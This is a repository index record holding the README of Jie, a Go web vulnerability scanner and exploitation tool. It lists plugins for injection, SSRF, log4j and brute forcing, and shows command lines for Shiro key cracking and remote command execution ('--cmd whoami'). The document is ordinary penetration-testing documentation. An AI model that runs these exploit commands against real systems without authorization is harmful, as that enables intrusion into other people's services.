{"id":18836886,"url":"https://github.com/yhy0/jie","last_synced_at":"2025-04-05T01:06:22.745Z","repository":{"id":144887131,"uuid":"594922017","full_name":"yhy0/Jie","owner":"yhy0","description":"Jie stands out as a comprehensive security assessment and exploitation tool meticulously crafted for web applications. Its robust suite of features encompasses vulnerability scanning, information gathering, and exploitation, elevating it to an indispensable toolkit for both security professionals and penetration testers.(expectations)","archived":false,"fork":false,"pushed_at":"2024-04-12T15:20:54.000Z","size":6246,"stargazers_count":470,"open_issues_count":4,"forks_count":42,"subscribers_count":9,"default_branch":"main","last_synced_at":"2024-04-12T20:46:33.993Z","etag":null,"topics":["apollo-exp","crawler","jie","scan","scanner","security-copilot","shiro-exp","vul","vulnerability","vulnerability-detection","vulnerability-exploitation","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"https://jie.fireline.fun/","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yhy0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-01-30T02:10:39.000Z","updated_at":"2024-04-15T03:23:27.392Z","dependencies_parsed_at":null,"dependency_job_id":"1fbe440e-8ddc-4e95-b6e3-685fb2fc7260","html_url":"https://github.com/yhy0/Jie","commit_stats":null,"previous_names":[],"tags_count":20,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yhy0%2FJie","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yhy0%2FJie/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yhy0%2FJie/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yhy0%2FJie/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yhy0","download_url":"https://codeload.github.com/yhy0/Jie/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247271528,"owners_count":20911587,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apollo-exp","crawler","jie","scan","scanner","security-copilot","shiro-exp","vul","vulnerability","vulnerability-detection","vulnerability-exploitation","vulnerability-scanners"],"created_at":"2024-11-08T02:32:40.171Z","updated_at":"2025-04-05T01:06:22.730Z","avatar_url":"https://github.com/yhy0.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Jie\n\n\u003e What I have accomplished cannot be reversed\n\n\u003cp align=\"center\"\u003e\n \u003ca href=\"https://github.com/yhy0/Jie/blob/main/LICENSE\"\u003e\n \u003cimg alt=\"Release\" src=\"https://img.shields.io/github/license/yhy0/Jie\"/\u003e\n \u003c/a\u003e\n \u003ca href=\"https://github.com/yhy0/Jie\"\u003e\n \u003cimg alt=\"Release\" src=\"https://img.shields.io/badge/release-v1.2.0-brightgreen\"/\u003e\n \u003c/a\u003e\n \u003ca href=\"https://github.com/yhy0/Jie\"\u003e\n \u003cimg alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/yhy0/Jie?color=9cf\"/\u003e\n \u003c/a\u003e\n \u003ca href=\"https://github.com/yhy0/Jie\"\u003e\n \u003cimg alt=\"GitHub forks\" src=\"https://img.shields.io/github/forks/yhy0/Jie\"/\u003e\n \u003c/a\u003e\n \u003ca href=\"https://github.com/yhy0/Jie\"\u003e\n \u003cimg alt=\"GitHub all release\" src=\"https://img.shields.io/github/downloads/yhy0/Jie/total?color=blueviolet\"/\u003e\n \u003c/a\u003e\n\u003c/p\u003e\n\n\n\n\u003cp align=\"center\"\u003e\n \u003ca href=\"https://github.com/yhy0/Jie/blob/main/README.md\"\u003eEnglish\u003c/a\u003e •\n \u003ca href=\"https://github.com/yhy0/Jie/blob/main/README_CN.md\"\u003e中文\u003c/a\u003e •\n\u003c/p\u003e\n\n`The English documentation was generated by GPT3.5`\n\n\n\nAnalyze and scan traffic by using [active crawler mode](https://github.com/Qianlitp/crawlergo) or [passive proxy](https://github.com/lqqyt2423/go-mitmproxy).\n\n**Please read the documentation carefully before using**\n\n## Pre-requisites for use\n- nmap\n- masscan\n- chromium\n\nYou should check whether the above programs exist on your machine before using them\n\n\u003e If you do not want to install nmap and masscan, you can use-nps to specify that port scanning will not be performed and turn off checking\n\n## Active Mode\n\nThree built-in crawler modes are available:\n\n| Mode | Corresponding Parameter |\n| :----------------------------------------------------------: | ----------------------- |\n| [crawlergo](https://github.com/Qianlitp/crawlergo) Crawler (Headless browser mode crawler) | `--craw c` |\n| **Default** [katana](https://github.com/projectdiscovery/katana) Crawler (Standard crawling mode using standard go http library to handle HTTP requests/responses) | `--craw k` |\n| [katana](https://github.com/projectdiscovery/katana) Crawler (Headless browser mode crawler) | `--craw kh` |\n\nWhen using headless mode, you can specify `--show` to display the crawling process of the browser.\n\nIn active mode, you can enter the **Security Copilot** mode by specifying `--copilot`, which will not exit after scanning, making it convenient to view the web results page.\n\n```bash\n./Jie web -t https://public-firing-range.appspot.com/ -p xss -o vulnerability_report.html --copilot\n```\n\nIf the username and password for the web are not specified, a `yhy/password` will be automatically generated, which can be viewed in the logs. For example, the following is the automatically generated one:\n\n`INFO [cmd:webscan.go(glob):55] Security Copilot web report authorized:yhy/3TxSZw8t8w`\n\n## Passive Mode (Security Copilot)\n\nPassive proxy is implemented through [go-mitmproxy](https://github.com/lqqyt2423/go-mitmproxy/).\n\n### Security Copilot\n\nWhy is it called `Security Copilot`? According to my idea, this is not just a vulnerability scanner, but also a comprehensive auxiliary tool.\n\nAfter hanging the scanner, go through the website once. Even if there are no vulnerabilities, it should tell me the approximate information of this website (fingerprint, cdn, port information, sensitive information, API paths, subdomains, etc.), which helps in further exploration manually, assisting in vulnerability discovery, rather than just finishing the scan and considering it done, requiring manual reevaluation.\n\n### Certificate Download\n\nHTTPS websites under passive proxy require installing certificates. The HTTPS certificate-related logic is compatible with [mitmproxy](https://mitmproxy.org/), \n\nand The certificate is automatically generated after the command is started for the first time, and the path is ~/.mitmproxy/mitmproxy-ca-cert.pem.\n\nInstall the root certificate. Installation steps can be found in the Python mitmproxy documentation: [About Certificates](https://docs.mitmproxy.org/stable/concepts-certificates/).\n\n### Start\n\n```bash\n ./Jie web --listen :9081 --web 9088 --user yhy --pwd 123 --debug\n```\n\nThis will listen on port 9081, and the web interface (SecurityCopilot) will be open on port 9088.\n\nSet the browser's proxy to 9081, or integrate with Burp.\n\n![image-20240101121809597](images/image-20240101121809597.png)\n\n![image-20240101121931631](images/image-20240101121931631.png)\n\n![image-20240101121957058](images/image-20240101121957058.png)\n\n## Basic Usage\n\n### Configuration\n\nSome configurations can be modified through [Jie_config.yaml](./Jie_config.yaml), or through the configuration interface of `http://127.0.0.1:9088/` (changes made in the web interface will be updated in the configuration file in real-time).\n\n`./Jie web -h`\n\n```bash\nFlags:\n --copilot Blocking program, go to the default port 9088 to view detailed scan information.\n In active mode, specify this parameter to block the program. After scanning, the program will not exit, and you can view information on the web port.\n -h, --help help for web\n --listen string use proxy resource collector, value is proxy addr, (example: 127.0.0.1:9080).\n Proxy address listened to in passive mode, default is 127.0.0.1:9080\n --np not run plugin.\n Disable all plugins\n -p, --plugin strings Vulnerable Plugin, (example: --plugin xss,csrf,sql,dir ...)\n Specify the enabled plugins. Specify 'all' to enable all plugins.\n --poc strings specify the nuclei poc to run, separated by ','(example: test.yml,./test/*).\n Custom nuclei vulnerability template address\n --pwd string Security Copilot web report authorized pwd.\n Web page login password. If not specified, a random password will be generated.\n --show specifies whether to show the browser in headless mode.\n Whether to display the browser in active scanning mode\n --user string Security Copilot web report authorized user, (example: yhy).]\n Web page login username, default is yhy (default \"yhy\")\n --web string Security Copilot web report port, (example: 9088)].\n Web page port, default is 9088 (default \"9088\")\n\nGlobal Flags:\n --debug debug\n -f, --file string target file\n -o, --out string output report file(eg:vulnerability_report.html)\n --proxy string proxy, (example: --proxy http://127.0.0.1:8080)\n -t, --target string target\n```\n\n### Download and Compile\n\nDownload the corresponding program from [https://github.com/yhy0/Jie/releases/latest](https://github.com/yhy0/Jie/releases/latest). The entire process is built automatically by **Github Action**, so\n\n feel free to use it.\n\n#### Linux/Mac\n\nSimply execute `make` to compile.\n\n#### Windows\n\n```bash\nexport CGO_ENABLED=1;go build -ldflags \"-s -w\" -o Jie main.go\n```\n\n### Integration with Burp\n\n#### Passive-scan-client Plugin (Strongly Recommended)\n\n[passive-scan-client](https://github.com/yhy0/passive-scan-client)\n\n![passive-scan-client](images/passive-scan-client.png)\n\nFreely select which scanner to use via three monitoring switches. **Note: JavaScript and CSS should also go through the scanner to collect information.**\n\n#### Setting Upstream Proxy in Burp (Not Recommended)\n\n![image-20231011213912055](images/image-20231011213912055.png)\n\nThe traffic of the Upstream Proxy Intruder and Repeater modules will also go through the scanner.\n\nThis will cause all traffic from manual testing to go through the scanner, which may not be ideal. This should be done as needed.\n\n\n## Features\n\nThe plugins internally judge whether they have been scanned based on the traffic collected passively or actively (TODO Should the scanning plugin be executed in a certain order?).\n\n### Information Gathering\n\n- Website fingerprint information\n- Aggregated display of URLs requested by each website\n- Website domain information: cdn/waf/cloud, resolution records\n- Jwt automatic blasting (todo generate dictionary automatically based on domain name)\n- Sensitive information\n- Active path scanning (bbscan rules, added a fingerprint field, when there is a fingerprint, only the corresponding rule will be scanned, for example, php websites will not scan springboot rules)\n- Port information\n- Collect domain names, IPs, APIs\n\n### Plugins\n\nSome scans will recognize the language environment based on the collected fingerprint information to prevent invoking Java scanning plugins for PHP websites.\n\n#### Directory Structure Scan\n\nThe `scan` directory is the scan plugin library, and each directory's plugin handles different situations.\n\n- PerFile: For each URL, including parameters, etc.\n- PerFolder: For the directory of the URL, the directory will be accessed separately\n- PerServer: For each domain, meaning a target is only scanned once\n\n| Plugin | Description | Default On | Scope |\n| :-------------------: | :----------------------------------------------------------: | :--------: | :----------------------------------------------------------: |\n| xss | Semantic analysis, prototype pollution, DOM pollution point propagation analysis | true | PerFile |\n| sql | Currently only implements some simple SQL injection detection | true | PerFile |\n| sqlmap | Forward traffic to sqlmap via specified sqlmap API for injection detection | false | PerFile |\n| ssrf | | true | PerFile |\n| jsonp | | true | PerFile |\n| cmd | Command execution | true | PerFile |\n| xxe | | true | PerFile |\n| fastjson | When a request is detected as json, it is patched with [@a1phaboy](https://socialify.git.ci/a1phaboy/)'s [FastjsonScan](https://socialify.git.ci/a1phaboy/FastjsonScan) scanner to detect fastjson; jackson is not implemented yet | true | PerFile |\n| bypass403 | [dontgo403](https://github.com/devploit/dontgo403) 403 bypass detection | true | PerFile |\n| crlf | crlf injection | true | PerFolder |\n| iis | iis high version short filename guessing [iis7.5-10.x-ShortNameFuzz]( | false | PerFolder |\n| nginx-alias-traversal | Directory traversal due to Nginx misconfiguration [nginx](https://github.com/vulhub/vulhub/blob/6a142caa19620bffa4cda9989697afd5b4136c87/nginx/insecure-configuration/README.md) | true | PerFolder |\n| log4j | log4j vulnerability detection, currently only tests request headers | true | PerFolder |\n| bbscan | [bbscan](https://github.com/lijiejie/bbscan) rule directory scan | true | PerFolder\u003cbr /\u003ePerServer (for rules that specify the root directory) |\n| portScan | Use [naabu](https://github.com/projectdiscovery/naabu) to scan Top 1000 ports, then use [fingerprintx](https://github.com/praetorian-inc/fingerprintx) to identify services | false | PerServer |\n| brute | If service blasting is enabled, service blasting will be performed after scanning the port service is detected | | PerServer |\n| nuclei | Integrated [nuclei](https://github.com/projectdiscovery/nuclei) | false | PerServer |\n| archive | Utilize https://web.archive.org/ to obtain historical url links (parameters) and then scan | true | PerServer |\n| poc | poc module written in Go for detection. The poc module relies on fingerprint recognition, and scanning will only occur when the corresponding fingerprint is recognized. No pluginization anymore | false | PerServer |\n\n### Logical Vulnerabilities TODO\n\nAdd multiple user cookies for authorization detection (it seems better to write tests with Burp plugins themselves, so there seems to be no need to write them here).\n\n\n## Third-party Libraries\n\n```go\npackage main\n\nimport (\n \"github.com/logrusorgru/aurora\"\n \"github.com/yhy0/Jie/SCopilot\"\n \"github.com/yhy0/Jie/conf\"\n \"github.com/yhy0/Jie/crawler\"\n \"github.com/yhy0/Jie/pkg/mode\"\n \"github.com/yhy0/Jie/pkg/output\"\n \"github.com/yhy0/logging\"\n \"net/url\"\n)\n\n/**\n @author: yhy\n @since: 2023/12/28\n @desc: //TODO\n**/\n\nfunc lib() {\n logging.Logger = logging.New(conf.GlobalConfig.Debug, \"\", \"Jie\", true)\n conf.Init()\n conf.GlobalConfig.Http.Proxy = \"\"\n conf.Global\n\nConfig.WebScan.Craw = \"k\"\n conf.GlobalConfig.WebScan.Poc = nil\n conf.GlobalConfig.Reverse.Host = \"https://dig.pm/\"\n conf.GlobalConfig.Passive.WebPort = \"9088\"\n conf.GlobalConfig.Passive.WebUser = \"yhy\"\n conf.GlobalConfig.Passive.WebPass = \"123456\" // Remember to change to a strong password\n\n // Enable all plugins\n for k := range conf.Plugin {\n // if k == \"nuclei\" || k == \"poc\" {\n // continue\n // }\n conf.Plugin[k] = true\n }\n\n if conf.GlobalConfig.Passive.WebPort != \"\" {\n go SCopilot.Init()\n }\n\n // Initialize crawler\n crawler.NewCrawlergo(false)\n\n go func() {\n for v := range output.OutChannel {\n // Show in SCopilot\n if conf.GlobalConfig.Passive.WebPort != \"\" {\n parse, err := url.Parse(v.VulnData.Target)\n if err != nil {\n logging.Logger.Errorln(err)\n continue\n }\n msg := output.SCopilotData{\n Target: v.VulnData.Target,\n }\n\n if v.Level == \"Low\" {\n msg.InfoMsg = []output.PluginMsg{\n {\n Url: v.VulnData.Target,\n Plugin: v.Plugin,\n Result: []string{v.VulnData.Payload},\n Request: v.VulnData.Request,\n Response: v.VulnData.Response,\n },\n }\n } else {\n msg.VulMessage = append(msg.VulMessage, v)\n }\n output.SCopilot(parse.Host, msg)\n logging.Logger.Infoln(aurora.Red(v.PrintScreen()).String())\n }\n logging.Logger.Infoln(aurora.Red(v.PrintScreen()).String())\n }\n }()\n mode.Active(\"http://testphp.vulnweb.com/\", nil)\n}\n```\n\n## Vulnerability Exploitation (Still in Development, Low Priority)\n\n**Currently under development, even I need to look at the code for help information, detailed documentation will be written once it's done.**\n\nDue to most of the vulnerability exploitation tools being written in Java and supporting different Java versions, setting up the environment is too cumbersome and frustrating, so Jie has been redefined.\n\nJie: A comprehensive and powerful vulnerability scanning and exploitation tool.\n\nThe current version (1.0.0) supports exploitation of the following vulnerabilities\n\n```shell\nA Powerful security assessment and utilization tools\n\nUsage:\n Jie [command]\n\nAvailable Commands:\n apollo apollo scan \u0026\u0026 exp\n fastjson fastjson scan \u0026\u0026 exp\n help Help about any command\n log4j log4j scan \u0026\u0026 exp\n other other scan \u0026\u0026 exp bb:BasicBrute、swagger:Swagger、nat:NginxAliasTraversal、dir:dir)\n s2 Struts2 scan \u0026\u0026 exp\n shiro Shiro scan \u0026\u0026 exp\n web Run a web scan task\n weblogic WebLogic scan \u0026\u0026 exp\n\nFlags:\n --debug debug\n -f, --file string target file\n -h, --help help for Jie\n -o, --out string output report file(eg:vulnerability_report.html)\n --proxy string proxy, (example: --proxy http://127.0.0.1:8080)\n -t, --target string target\n\nUse \"Jie [command] --help\" for more information about a command.\n```\n\nFor example, Shiro key vulnerability exploitation:\n\n```bash\n# Without specifying -m, it defaults to blasting the key and exploitation chain\nJie shiro -t http://127.0.0.1\n\n# Exploitation\nJie Shiro -t http://127.0.0.1 -m exp -k 213123 -g CCK2 -e spring -km CBC --cmd whoami\n```\n\nWhere various tools by other researchers have been stitched together, some of which are included in the description of scanning and exploiting vulnerabilities. If anything is missing, you can contact me to add it.\nMore vulnerability exploitation will be supported later.\n\nhttps://jie.fireline.fun/\n\n## References\n\n### Crawlers\n\n[crawlergo](https://github.com/Qianlitp/crawlergo)\n\n[katana](https://github.com/projectdiscovery/katana)\n\n\n### Passive Scan Proxy\n\nhttps://github.com/lqqyt2423/go-mitmproxy\n\n### Xss\n\nSemantic analysis, prototype pollution, DOM pollution point propagation analysis\n\nhttps://github.com/w-digital-scanner/w13scan\n\nhttps://github.com/ac0d3r/xssfinder\n\nhttps://github.com/kleiton0x00/ppmap\n\n### SQL Injection\n\nExtracted code related to detection from [sqlmap](https://github.com/sqlmapproject/sqlmap)\n\n### POC\n\nDetection through fingerprint recognition\n\ntodo Not embedding the nuclei's yml files, changing to download and update online from the official website\n\nhttps://github.com/projectdiscovery/nuclei\n\nSome of the POCs in xray are written improperly, causing parsing problems, which need to be corrected.\nFor example:\nresponse.status == 200 \u0026\u0026 response.headers[\"content-type\"] == \"text/css\" \u0026\u0026 response.body.bcontains(b\"$_GET['css']\")\n\n\ncontent-type should be Content-Type\n\nBut it seems there is a parsing problem.\n\nDo not use xray's POC, only use nuclei's yml files\nTogether with the need for organization to prevent duplicate scanning, nuclei-template's POCs are enough.\n\n### Vulnerability Scanners\n\nhttps://github.com/wrenchonline/glint \n\nhttps://github.com/veo/vscan\n\n### Some Other Vulnerabilities\n\n#### Sensitive Information\n\nhttps://github.com/mazen160/secrets-patterns-db\nhttps://github.com/pingc0y/URLFinder\n\n#### Fastjson\n\nhttps://github.com/a1phaboy/FastjsonScan\n\n\n### Fingerprinting\n\nhttps://github.com/w-digital-scanner/w13scan\n\nhttps://github.com/SleepingBag945/dddd\n\n## License\n\nThis code is distributed under the AGPL-3.0 license. See [LICENSE](https://github.com/yhy0/Jie/blob/main/LICENSE) in this directory.\n\n## Acknowledgments\n\nThanks to the open source works and blogs of various masters, as well as [JetBrains](https://www.jetbrains.com/)' support for a series of easy-to-use IDEs for this project.\n\n![JetBrains Logo (Main) logo](https://resources.jetbrains.com/storage/products/company/brand/logos/jb_beam.svg)\n\n## Star History\n\n[![Star History Chart](https://api.star-history.com/svg?repos=yhy0/Jie\u0026type=Date)](https://star-history.com/#yhy0/Jie\u0026Date)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyhy0%2Fjie","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyhy0%2Fjie","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyhy0%2Fjie/lists"}